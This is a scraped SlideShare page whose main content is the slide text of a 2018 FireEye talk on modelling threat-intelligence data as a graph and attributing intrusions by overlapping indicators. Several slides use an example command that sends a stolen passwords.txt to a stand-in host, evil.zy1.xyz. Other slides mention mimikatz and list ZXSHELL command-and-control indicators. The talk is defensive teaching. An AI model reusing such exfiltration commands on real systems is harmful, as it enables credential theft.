My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 

Recently uploaded (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 

CONFidence 2018: Everything’s Connected aka Threat Intelligence 102 (Marcin Siedlarz)

  • 1. Everything’s Connected aka Threat Intelligence 102 Marcin Siedlarz TORE Advanced Practices – Adversary Pursuit FireEye
  • 2. About me, the preso and the motivation 2
  • 3. ©2018 FireEye | Private & Confidential About me § 9 years of experience of incident response and technical analysis of some of the most prolific and advanced cyber threats § CN/RU threat groups targeting PL gov § Contributing author to the Dragonfly research and whitepaper § Research of various APTs at FireEye 3
  • 4. ©2018 FireEye | Private & Confidential Leonardo da Vinci 4 Realize that everything connects to everything else.
  • 5. ©2018 FireEye | Private & Confidential 5
  • 7. ©2018 FireEye | Private & Confidential Intelligence Objectives & Principles 7 Reduce uncertainty Knowledge that is: • Accurate • Timely • Relevant Knowledge about: • The threat • Surrounding environment • Visibility on threat actors, exploits, and malware • Tactical: TTPs, indicators, artifacts • Strategic: TTPs over time, industries targeted, data stolen, analysis of motivations and who benefits, attacker infrastructure • Attribution capability
  • 8. ©2018 FireEye | Private & Confidential Attribution capability 8 Incident1 IOC IOC Incident2 IOC IOC Incident3 IOC
  • 9. ©2018 FireEye | Private & Confidential Attribution capability 9 IOCs APTxTTPs TTPs
  • 10. ©2018 FireEye | Private & Confidential 10
  • 12. ©2018 FireEye | Private & Confidential 12 car VIN color manufacturing date reg plate number reg date person first name surname birthdate
  • 13. ©2018 FireEye | Private & Confidential 13 car reg plate person carhasreg personhascar Queries: • All red cars manufactured in 2012 • All red cars belonging to male 21- 25 yrs old, sedan, registration plate starts with „W”
  • 14. Cyber threat data model 14
  • 15. ©2018 FireEye | Private & Confidential Example nodes and edges (malware comms) 15 file fqdn file file ipv4srv url rundnslookup runconnect rungeturl
  • 16. ©2018 FireEye | Private & Confidential Example nodes and edges (hostops) 16 host file host host host hostcmd fsrefs latmove orghostcmd
  • 17. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 17 email file sentemail email emailto filefile subfilesubfile url filedocs
  • 18. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 18 email bhv/meth.phish.sender file bhv/meth.phish.msg sentemail email bhv/meth.phish.vic emailto file bhv/meth.phish .payload file bhv/meth.phish.body subfilesubfile url bhv/meth.phish .payload filedocs
  • 19. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 19
  • 20. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 20
  • 21. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 21
  • 22. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 22
  • 23. ©2018 FireEye | Private & Confidential Aspects -> Context aspect description bhv/meth.phish.sender An address that has been used to send a phishing message bhv/meth.phish.msg A phishing email message (or relevant headers) bhv/meth.phish.vic The recipient or intended target of phishing email bhv/meth.phish.payload Code attached or linked to the phishing email bhv/meth.phish.body The body of phishing email. Typically parsed out from rfc822 message 23
  • 24. ©2018 FireEye | Private & Confidential Aspects -> Context (bhv/meth) 24 bhv meth phish vic sender body payload fileops macro obf hostops wipe datamine
  • 25. ©2018 FireEye | Private & Confidential Aspects -> Context (bhv/capa) bhv/capa c2 twitter github crypt aes128 rc4 datamine keylog screen files 25
  • 26. ©2018 FireEye | Private & Confidential Aspects -> Context (sig) sig/ cve 2017 2018 exploit mal sogu zxshell 26
  • 27. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 27 email bhv/meth.phish.sender file bhv/meth.phish.msg sentemail email bhv/meth.phish.vic emailto file bhv/meth.phish .payload file bhv/meth.phish.body subfilesubfile url bhv/meth.phish .payload filedocs
  • 28. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 28 file bhv/meth.phish .payload file:basename = ”Payroll 2018.xls” bhv/meth.phish.payload +sig/mal.foobar +bhv/meth.fileops.macro file +sig/mal.foobar +bhv/meth.codelang.vbscript +bhv/role.macro url url=“https://foobarxyz.com/foo.exe +sig/mal.foobar
  • 29. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 29 url url=“https://foobarxyz.com/foo.exe +sig/mal.foobar file foo.exe fqdn foobarxyz.com email foobar@example.com ipv4addr 1.2.3.4 file:basename=foo.exe +sig/mal.foobar +code/foobar +bhv/role.backdoor +bhv/capa.comms.http +bhv/capa.cmd.exec
  • 30. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 30 file foo.exe url url=“https://c2domain.com/foo.php” +sig/mal.foobar fqdn fqdn=“c2domain.com +sig/mal.foobar host url file file:base=meow.exe +code/mimikatz
  • 31. ©2018 FireEye | Private & Confidential Example nodes and edges (spear-phishing) 31 host file file:base=meow.exe +code/mimikatz file file:base=passwords.txt +trend/exfil.creds.hash fs:rawpath=C:xyzpasswords.txt hostcmd ping evil.zy1.xyz foo.exe –send passwords.txt evil.zy1.xyz:8001 +bhv/meth.exfil +sig/mal.foobar
  • 32. ©2018 FireEye | Private & Confidential Attribution capability 32 IOCs APTxTTPs TTPs
  • 33. ©2018 FireEye | Private & Confidential +thr / +apt 33 § Most important aspect tree § Represents analytical assessment that a indicator is used by a threat group § Several considerations – Less rigid attribution framework == more attribution mistakes – Analytic confidence – Correlation value – Bias
  • 34. ©2018 FireEye | Private & Confidential 34 We should be handing out UNCs like candy
  • 35. ©2018 FireEye | Private & Confidential 35 apt/ apt1 apt2 aptx unc1 unc2
  • 36. ©2018 FireEye | Private & Confidential 36 apt/ apt1 apt2 aptx unc1 unc2
  • 37. ©2018 FireEye | Private & Confidential unc1 + unc2 37 node sig bhv apt foobarsender@yahoo. com meth.phish.sender unc1 Payroll 2018.xls mal.foobar meth.phish.payload unc1 foobarxyz.com mal.foobar unc1 foo.exe mal.foobar role.backdoor unc1 c2domain.com mal.foobar unc1 meow.exe rel.mimikatz unc1 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil unc1
  • 38. ©2018 FireEye | Private & Confidential unc1 + unc2 38 node sig bhv apt random@mail.com meth.phish.sender Job offer.docx mal.foobar meth.phish.payload barfooabc.com mal.foobar abc.exe mal.foobar role.backdoor random.com mal.foobar mimi.exe rel.mimikatz
  • 39. ©2018 FireEye | Private & Confidential unc1 + unc2 39 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2
  • 40. ©2018 FireEye | Private & Confidential unc1 + unc2 40 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil
  • 41. ©2018 FireEye | Private & Confidential unc1 + unc2 41 node sig bhv apt random@mail.com meth.phish.sender unc2 Job offer.docx mal.foobar meth.phish.payload unc2 barfooabc.com mal.foobar unc2 abc.exe mal.foobar role.backdoor unc2 random.com mal.foobar unc2 mimi.exe rel.mimikatz unc2 foo.exe –send passwords.txt evil.zy1.xyz:8001 mal.foobar meth.exfil unc2
  • 42. ©2018 FireEye | Private & Confidential unc1 + unc2 42 Overlaps Trait Example Overlap conf.level Use of FOOBAR Low Use of same stagedir C:xyzpasswords.txt Medium Use of same exfil fqdn evil.zy1.xyz High
  • 44. ©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 44 SSL client HELLO sig 78.189.98.__ 122.252.228.__ 213.5.55.__ 80.69.180.__ 119.47.69.__ 14.55.203.__
  • 45. ©2018 FireEye | Private & Confidential ZXSHELL ssl certificates -----BEGIN CERTIFICATE----- MIIDBjCCAe4CCQDAg0xj8aawHTANBgkqhkiG9w0BAQUFADBFMQswCQYDVQQGEwJB VTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0 cyBQdHkgTHRkMB4XDTE2MDgxMDAyMzQxN1oXDTE3MDgxMDAyMzQxN1owRTELMAkG A1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0 IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB AM+arV8LRA3mB6PHuo37Y00/qzKyNJiyBOrlbO9BTUwnbPyNCSCgorESHqg74m+2 Q2VK+YcBkWSFdwl2qZ3Gqzh4YRf6+KqVfdk8BtDDnoRy21D3ZJAEJFU3nRNgRFhM p+aysu7YTRnoM6YGut+7IKycwiU5SdtD+gEp7REthayg+wKIgbjI0sx7OaV0Rwzs D5ZYcrFb9V39VVprHMAeVbpsmu8n8Z6lIr7WWTPM13UZW5B2Qa7Dum+ylLk/Zp20 gooelLZjmWGGvqXAcxkxkMs0g+KBrpflGMBj1JtHS2p8qLGl2V/ZayaU5gVWABEr cMbYOO/ZvSAMIb2n2UDyuRcCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAf3rWXfyi C5OTpZYLeHBQL3hFyuK3HNBCwCSeKDutNzDoB4KHEHtSjqvp+kz/kcLU13sc8YFj HQrkdGZqyz8SNt1jna97opcSr94jDGZW/d8maZbKPN3tKt17yRovjBSkyIr1LtQ7 Nbo8EdGSsxBMnYxNqYUNqI94pg1Xr1WVmShhszO+BLl2JX1+2oMOV4GnvNDcaL9v LmuDDTzabLqWp280i1UBFbXuNid8DW7UOhhkn+YvQAoxxdqCSvHBgRXjqVNv2bcs 86E1NC8lbItLFK2/SvuyViuZA95A4RHParDtwuYGxSemp+mtt0qIck44G+MP+Jn0 rsKK05+u6n5/6g== -----END CERTIFICATE----- 45 78.189.98.__ 122.252.228.__ 213.5.55.__ 80.69.180.__ 119.47.69.__ 14.55.203.__ x509:serial=d9:be:00:43:b7:96:5c:48
  • 46. ©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 46 49.206.128.35 x509:serial=d9:be:00:43:b7:96:5c:48 pdns: philippinenews.mooo.com second.photo-frame.com shoping.jumpingcrab.com
  • 47. ©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 47 Source: https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/
  • 48. ©2018 FireEye | Private & Confidential ZXSHELL ssl certificates 48 80.69.180.__ 27.106.22.__ 14.35.248.__ 139.162.55.__
  • 49. Launching your own CTI program 49
  • 50. ©2018 FireEye | Private & Confidential Key components of a TI program 50 4 DO’s § TI personnel: – Small team, even 1-2 analysts will do – RE capability in the TI or larger SOC team § Technology stack that allows pushing signatures – snort – yara § Pivoting and context creation § Next steps: – graph database, proprietary <-> open-source (https://github.com/vertexproject/synapse)
  • 51. ©2018 FireEye | Private & Confidential Key components of a TI program 51 1 Don’t § Newscaster ”threat intelligence” aka let’s buy a bunch of feeds, combine them together and brief C-level executives § Instead: – Focus on the data you already have (IR, SOC, external partnerships) – Get access to enrichment datasources (pdns, whois, ssl certificates) – Hunt for attackers activity – Tag and describe what you see – Pivot to find overlaps